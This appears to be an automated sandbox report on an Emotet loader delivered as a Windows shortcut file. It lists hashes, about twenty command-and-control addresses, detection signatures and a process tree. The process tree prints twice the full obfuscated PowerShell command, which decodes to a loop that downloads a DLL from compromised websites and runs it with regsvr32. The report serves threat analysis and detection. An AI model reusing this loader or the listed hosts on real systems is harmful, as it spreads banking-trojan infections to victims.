emotet | a96a59188fc527ee076437532a21d34e4b6c3d84a6abc9d1e576adbb50d7e133

General

Target

44-76912499472.lnk
Size

3KB
MD5

afa789a5a4197b43071da4d94067d346
SHA1

f5ef0b10c608fb042edae39919903b4c7510d49b
SHA256

9e90586b5881001bffc59e5ab90808e1470b787e1095052602cece861c0648d6
SHA512

2e5d94eb4d8d9fefe0dae56a7384673ae4f08ae1dc3f14bd63a01ca933689d555629b6b7acacb1b40a7ed0839ba99f9ce5f5e0791bdb09cb50b6dcb198a88808

Score

10^/10

emotet epoch5 banker suricata trojan

Malware Config

Extracted

Family

emotet

Botnet

Epoch5

C2

194.9.172.107:8080

66.42.57.149:443

165.22.73.229:8080

202.29.239.162:443

104.248.225.227:8080

54.38.242.185:443

103.133.214.242:8080

78.47.204.80:443

210.57.209.142:8080

103.41.204.169:8080

118.98.72.86:443

88.217.172.165:8080

87.106.97.83:7080

85.25.120.45:8080

195.77.239.39:8080

37.44.244.177:8080

36.67.23.59:443

160.16.143.191:7080

54.38.143.246:7080

159.69.237.188:443

eck1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

8 4136 powershell.exe
14 4136 powershell.exe
15 4136 powershell.exe
17 4136 powershell.exe
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation cmd.exe
Loads dropped DLL 2 IoCs

Processes:

regsvr32.exeregsvr32.exe

pid process

3524 regsvr32.exe
1316 regsvr32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exeregsvr32.exe

pid process

4136 powershell.exe
4136 powershell.exe
1316 regsvr32.exe
1316 regsvr32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4136 powershell.exe

flow	pid	process
8	4136	powershell.exe
14	4136	powershell.exe
15	4136	powershell.exe
17	4136	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe

pid	process
3524	regsvr32.exe
1316	regsvr32.exe

pid	process
4136	powershell.exe
4136	powershell.exe
1316	regsvr32.exe
1316	regsvr32.exe

description	pid	process
Token: SeDebugPrivilege	4136	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.execmd.exepowershell.exeregsvr32.exe

description	pid	process	target process
PID 4664 wrote to memory of 3300	4664	cmd.exe	cmd.exe
PID 4664 wrote to memory of 3300	4664	cmd.exe	cmd.exe
PID 3300 wrote to memory of 4136	3300	cmd.exe	powershell.exe
PID 3300 wrote to memory of 4136	3300	cmd.exe	powershell.exe
PID 4136 wrote to memory of 3524	4136	powershell.exe	regsvr32.exe
PID 4136 wrote to memory of 3524	4136	powershell.exe	regsvr32.exe
PID 3524 wrote to memory of 1316	3524	regsvr32.exe	regsvr32.exe
PID 3524 wrote to memory of 1316	3524	regsvr32.exe	regsvr32.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\44-76912499472.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /v:on /c XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX||p^owershell.^e^xe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='skUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vdGhlZ2VlcnMuY29tL21lZGlhLzE4VEtRVTM2Vi8iLCJodHRwOi8vdGFsYml6LmNvbS9fX01BQ09TWC83WFY5c3ZuV2VEcS8iLCJodHRwOi8vdGhlc3Rld2FyZHNjby5jb20vZ0pSV0ZCR3ZLVlZ4akUvIiwiaHR0cHM6Ly90aGVhcmxlcGhvdG9ncmFwaHkuY29tL3dwL25ybVkvIiwiaHR0cHM6Ly90ZWNuaS1zb2Z0LmNvbS9BQ0NFU09SSU9TL1hxcC8iLCJodHRwOi8vdGl0YW5pdW1zcGFyZXBhcnRzLmNvbS93cC1pbmNsdWRlcy9vcmdkVExoTkF5N1NkZUsvIik7JHQ9Ind3bUF0TyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxnZEdESVJxbFdnLnFjUTtSZWdzdnIzMi5leGUgIiRkXGdkR0RJUnFsV2cucWNRIjticmVha30gY2F0Y2ggeyB9fQ==';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"
2⤵
- Suspicious use of WriteProcessMemory
PID:3300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$qbxoDL='IFdyaXRlLUhvc3QgIkNQWUlxIj';$ksGeW='skUHJvZ3Jlc3NQcmVmZXJlbmNlPSJTaWxlbnRseUNvbnRpbnVlIjskbGlua3M9KCJodHRwOi8vdGhlZ2VlcnMuY29tL21lZGlhLzE4VEtRVTM2Vi8iLCJodHRwOi8vdGFsYml6LmNvbS9fX01BQ09TWC83WFY5c3ZuV2VEcS8iLCJodHRwOi8vdGhlc3Rld2FyZHNjby5jb20vZ0pSV0ZCR3ZLVlZ4akUvIiwiaHR0cHM6Ly90aGVhcmxlcGhvdG9ncmFwaHkuY29tL3dwL25ybVkvIiwiaHR0cHM6Ly90ZWNuaS1zb2Z0LmNvbS9BQ0NFU09SSU9TL1hxcC8iLCJodHRwOi8vdGl0YW5pdW1zcGFyZXBhcnRzLmNvbS93cC1pbmNsdWRlcy9vcmdkVExoTkF5N1NkZUsvIik7JHQ9Ind3bUF0TyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxnZEdESVJxbFdnLnFjUTtSZWdzdnIzMi5leGUgIiRkXGdkR0RJUnFsV2cucWNRIjticmVha30gY2F0Y2ggeyB9fQ==';$k=$qbxoDL+$ksGeW;$sfKoh=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($k));$jphbot=$sfKoh;iex($jphbot)}"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4136

C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\wwmAtO\gdGDIRqlWg.qcQ
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3524

C:\Windows\system32\regsvr32.exe
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\WcouDSMTFUfJ\RNUIcFORsDL.dll"
5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1316

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\wwmAtO\gdGDIRqlWg.qcQ
Filesize
402KB

MD5
3747cf33856720d326964080824a674c

SHA1
c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da

SHA256
2a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48

SHA512
3a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec

Download Submit
C:\Users\Admin\AppData\Local\wwmAtO\gdGDIRqlWg.qcQ
Filesize
402KB

MD5
3747cf33856720d326964080824a674c

SHA1
c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da

SHA256
2a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48

SHA512
3a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec

Download Submit
C:\Windows\System32\WcouDSMTFUfJ\RNUIcFORsDL.dll
Filesize
402KB

MD5
3747cf33856720d326964080824a674c

SHA1
c73d467e95a5bd2f46d9aa7e891b41ffbb66b9da

SHA256
2a0ddf25ee7551f0d23d1680aac9f724ca31d3b3f84ea494f5ae634991f91f48

SHA512
3a91eec944f8d8e1641c62f17566fffda15abbbd847e800b9d2072feb3ae6d1010a09939e2bcc1e8d2fde9fa0cdb71eb1d724c3d6163be819e379b7b2dc432ec

Download Submit
memory/1316-141-0x0000000000000000-mapping.dmp

Download
memory/3300-130-0x0000000000000000-mapping.dmp

Download
memory/3524-135-0x0000000000000000-mapping.dmp

Download
memory/3524-138-0x0000000180000000-0x0000000180031000-memory.dmp

Filesize
196KB

Download
memory/4136-131-0x0000000000000000-mapping.dmp

Download
memory/4136-132-0x000001E326880000-0x000001E3268A2000-memory.dmp

Filesize
136KB

Download
memory/4136-133-0x00007FFD46420000-0x00007FFD46EE1000-memory.dmp

Filesize
10.8MB

Download
memory/4136-134-0x000001E3274E0000-0x000001E327C86000-memory.dmp

Filesize
7.6MB

Download

Analysis

Sharing